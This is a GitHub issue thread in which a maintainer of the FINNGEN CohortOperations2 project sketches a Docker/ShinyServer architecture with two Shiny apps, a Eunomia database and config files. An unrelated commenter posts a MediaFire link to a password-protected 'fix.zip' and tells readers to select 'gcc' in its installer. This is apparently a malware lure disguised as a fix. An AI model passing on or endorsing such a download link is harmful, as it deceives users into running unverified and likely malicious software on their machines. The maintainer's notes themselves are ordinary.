### ISSUE TITLE
New architecture tmp notes for me

### ISSUE THREAD

**Issue by javier-gracia-tabuenca-tuni** [FINNGEN/CohortOperations2#80]
## Docker container with ShinyServer 
Must have
- Install packages from RSPM
- Fater BLAS
- safer to have a renv file ?
- Seems the best option ? rocker/shiny-verse with shiny and tidyverse, https://rocker-project.org/images/versioned/shiny.html

What the docker file does
- Install 2 apps,  CohortOperations2 and CO2AnalysisModules
- Install a Eunomia database
- Config files with default settings to connect to Eunomia
- Make 2 shiny apps in 2 folders with each of above
- Accept as input new configuration files to connect to other list of databases, in atlas development, and in sandbox

## CO2AnalysisModules 
- One shiny app that takes on the url the path to a duckdb file and opens the corresponding view
- One config file with configurations per each viewer

## CohortOperations2
- One config file with basic configuration about the app
- One config file with the list of databases to connect to 
- One config file with the list of analysis to provide

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by javier-gracia-tabuenca-tuni** [comment]
moved to other issues
